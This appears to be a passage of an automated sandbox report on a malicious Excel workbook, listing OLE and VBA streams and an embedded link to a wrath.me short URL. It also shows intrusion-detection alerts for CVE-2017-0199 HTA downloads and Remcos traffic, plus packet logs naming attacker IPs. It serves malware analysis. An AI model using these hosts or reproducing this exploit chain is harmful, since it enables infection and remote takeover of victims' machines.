                                                                                                                                                                                              Stream Size:484
                                                                                                                                                                                              Entropy:3.922883556049869
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , D . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I N V . . . . . P L . . . . . D P L - 1 . . . . . I N V ! P r i n t _ A r e a . . . . . P L ! P r i n t _ A r e a . . . . . . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 01 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/MBD002A5E23/\x5SummaryInformation
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:19956
                                                                                                                                                                                              Entropy:3.056974324659501
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . M . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y d t . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . W P S O f f i c e . . @ . . . . E . w . @ . . . . . 2 . @ . . . . . _ . . . . . . . . . . G . . . . M . . . . . . . . ? . . . . . . . . . | & . . . . . . . . . . . . . . & . . . " W M F C . . . . .
                                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 4d 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 74 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/MBD002A5E23/Workbook
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                              Stream Size:95624
                                                                                                                                                                                              Entropy:3.889652332882722
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . Q | 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/MBD002A6130/\x1CompObj
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:94
                                                                                                                                                                                              Entropy:4.345966460061678
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/MBD002A6130/\x1Ole
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:64
                                                                                                                                                                                              Entropy:2.935667186688699
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . F e u i l 1 ! O b j e c t 1 8 4 .
                                                                                                                                                                                              Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 46 65 75 69 6c 31 21 4f 62 6a 65 63 74 20 31 38 34 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/MBD002A6130/CONTENTS
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:PDF document, version 1.7
                                                                                                                                                                                              Stream Size:21760
                                                                                                                                                                                              Entropy:7.954015192696893
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:% P D F - 1 . 7 . % . 1 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 2 0 R . / A c r o F o r m 2 4 0 R . > > . e n d o b j . 8 0 o b j . < < . / L e n g t h 2 . > > . s t r e a m . . q . . . e n d s t r e a m . e n d o b j . 9 0 o b j . < < . / L e n g t h 2 . > > . s t r e a m . . q . . . e n d s t r e a m . e n d o b j . 1 0 0 o b j . < < . / L e n g t h 3 8 . / F i l t e r / F l a t e D e c o d e . > > . s t r e a m . . x + 2 7 2 3 7 U 0 . B . . s = # . 3
                                                                                                                                                                                              Data Raw:25 50 44 46 2d 31 2e 37 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 32 34 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 38 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 32 0a 3e 3e 0a 73 74 72 65 61 6d 0d 0a 71 0a 0d 0a 65 6e 64 73 74 72 65 61 6d 0a 65
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B08/Workbook
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                              Stream Size:218908
                                                                                                                                                                                              Entropy:7.606771386739727
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:MBD00201B09/\x1Ole
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:260
                                                                                                                                                                                              Entropy:5.371506390107094
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . . u k B . . . . . . . . . . . . z . . . y . . . K . v . . . h . t . t . p . s . : . / . / . w . r . a . t . h . . . m . e . / . D . e . S . H . z . c . . . y . . p . | = y n @ ] 9 . # W " W u V . { ] b . . e R H ] X Z @ u - . . . . . . . . . . . . . . . . * . . . 6 . N . i . G . 4 . d . X . r . b . y . J . p . M . W . s . V . B . P . G . F . . . . . ^ . ) @ i ` $ # L | ` L . N
                                                                                                                                                                                              Data Raw:01 00 00 02 d7 e7 c4 75 f8 e9 6b 42 00 00 00 00 00 00 00 00 00 00 00 00 7a 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 76 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 77 00 72 00 61 00 74 00 68 00 2e 00 6d 00 65 00 2f 00 44 00 65 00 53 00 48 00 7a 00 63 00 00 00 a9 8e 79 c8 b0 05 c5 70 12 fd a9 7c 3d 79 9e 6e 40 c7 5d 39 12 d4 23 87 c7 57 f4 f7 dc 22 d7 57
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:Workbook
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                              Stream Size:339327
                                                                                                                                                                                              Entropy:7.998801505532503
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . _ [ . S [ + . ] . . 4 i ! p V i . . | x . @ P V 9 . . . . . . . . . . > . . . \\ . p . . . = . . . . . . ' . & # * q . < . . \\ Q . D $ ' O , 8 ; [ . m . C : _ N . w . . h . 7 . Y X c [ " . f R . o y = . < r Y . _ 0 . @ . B . . . 0 . a . . . Y . . . = . . . . B . . . ] K . | . . d . 6 K . . . . ~ . . . . e ; . . . . P . . . . ^ . . . . ~ . . . . = . . . N . B . . . . . - N @ . . . . . . . . " . . . . . . . . . * A . . . . . . . . | 1 . . . L t . . O . $ .
                                                                                                                                                                                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5f 5b 96 d9 a2 9d 53 b2 5b 2b ce be 5d c5 f5 ad c5 a1 eb c1 02 34 69 21 ae bd 70 56 99 69 06 1c 7c 78 1d 40 50 56 ba 39 06 e4 de 0d 15 b6 be 9d e1 00 02 00 b0 04 c1 00 02 00 3e fb e2 00 00 00 5c 00 70 00 c2 94 1a fd 3d 00 ce 8f d6 2e 15 2e ba 2e 27 fe 8f 1a 26 ec 23 f1 2a 71 01 81 3c 0b 04 5c
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Stream Size:523
                                                                                                                                                                                              Entropy:5.266905523023123
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:I D = " { 7 5 6 D 9 2 A 6 - 0 1 A 9 - 4 4 6 3 - B 5 A 8 - 2 4 F 8 1 6 0 9 7 C A B } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F A F 8 3 B 1 A D A 1 E D A 1 E D
                                                                                                                                                                                              Data Raw:49 44 3d 22 7b 37 35 36 44 39 32 41 36 2d 30 31 41 39 2d 34 34 36 33 2d 42 35 41 38 2d 32 34 46 38 31 36 30 39 37 43 41 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:104
                                                                                                                                                                                              Entropy:3.0488640812019017
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                                                                                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:2644
                                                                                                                                                                                              Entropy:3.9861864741734827
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                                                                                                              Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                                                              CLSID:
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:553
                                                                                                                                                                                              Entropy:6.355052434086827
                                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                                              Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . , 5 . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                                                                                                                                                              Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 2c 35 17 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                              2024-10-08T15:37:11.380454+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.224916238.240.44.980TCP
                                                                                                                                                                                              2024-10-08T15:37:11.578912+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)138.240.44.980192.168.2.2249162TCP
                                                                                                                                                                                              2024-10-08T15:37:13.956297+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.224916438.240.44.980TCP
                                                                                                                                                                                              2024-10-08T15:37:13.956502+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)138.240.44.980192.168.2.2249164TCP
                                                                                                                                                                                              2024-10-08T15:37:33.333724+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1207.241.227.242443192.168.2.2249166TCP
                                                                                                                                                                                              2024-10-08T15:37:33.525308+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.224917138.240.44.980TCP
                                                                                                                                                                                              2024-10-08T15:37:35.755627+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1138.240.44.980192.168.2.2249172TCP
                                                                                                                                                                                              2024-10-08T15:37:35.755627+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1138.240.44.980192.168.2.2249172TCP
                                                                                                                                                                                              2024-10-08T15:37:38.599226+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249173192.3.101.1849674TCP
                                                                                                                                                                                              2024-10-08T15:37:39.747307+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249174192.3.101.1849674TCP
                                                                                                                                                                                              2024-10-08T15:37:39.972588+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249175178.237.33.5080TCP
                                                                                                                                                                                              2024-10-08T15:37:49.665716+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1207.241.227.242443192.168.2.2249176TCP
                                                                                                                                                                                              2024-10-08T15:37:51.566344+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1138.240.44.980192.168.2.2249177TCP
                                                                                                                                                                                              2024-10-08T15:37:51.566344+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1138.240.44.980192.168.2.2249177TCP
                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Oct 8, 2024 15:37:09.382296085 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                              Oct 8, 2024 15:37:09.382328033 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:09.382479906 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                              Oct 8, 2024 15:37:09.389146090 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                              Oct 8, 2024 15:37:09.389161110 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:09.884838104 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:09.885119915 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                              Oct 8, 2024 15:37:09.892263889 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                              Oct 8, 2024 15:37:09.892281055 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:09.892674923 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:09.893147945 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                              Oct 8, 2024 15:37:10.067420006 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                              Oct 8, 2024 15:37:10.111401081 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:10.465080023 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:10.465153933 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:10.466412067 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                              Oct 8, 2024 15:37:10.466412067 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                              Oct 8, 2024 15:37:10.466412067 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                              Oct 8, 2024 15:37:10.502278090 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:10.507428885 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:10.507514000 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:10.507565022 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:10.513467073 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:10.836081028 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                              Oct 8, 2024 15:37:10.836105108 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.380336046 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.380357027 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.380376101 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.380397081 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.380413055 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.380454063 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.380486965 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.578912020 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579045057 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579056025 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579077005 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579077005 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579088926 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579108953 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579128981 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579173088 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579890966 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579901934 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579921007 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579931021 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579946995 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579971075 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.580904007 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.580952883 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.779381990 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.779416084 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.779432058 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.779443979 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.779459000 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.779480934 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.779480934 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.779493093 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.779753923 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.779793024 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.779809952 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.780061960 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.780152082 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.780163050 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.780180931 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.780186892 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.780200958 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.780208111 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.780214071 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.780237913 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.781202078 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.781214952 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.781234026 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.781234980 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.781249046 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.781249046 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.781265020 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.781279087 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.781980991 CEST804916238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.782020092 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.970540047 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.970540047 CEST4916280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:11.988889933 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                              Oct 8, 2024 15:37:11.988924980 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.988975048 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                              Oct 8, 2024 15:37:12.100651979 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                              Oct 8, 2024 15:37:12.100687981 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:12.575696945 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:12.575790882 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                              Oct 8, 2024 15:37:12.582581997 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                              Oct 8, 2024 15:37:12.582595110 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:12.582916975 CEST44349163188.114.97.3192.168.2.22
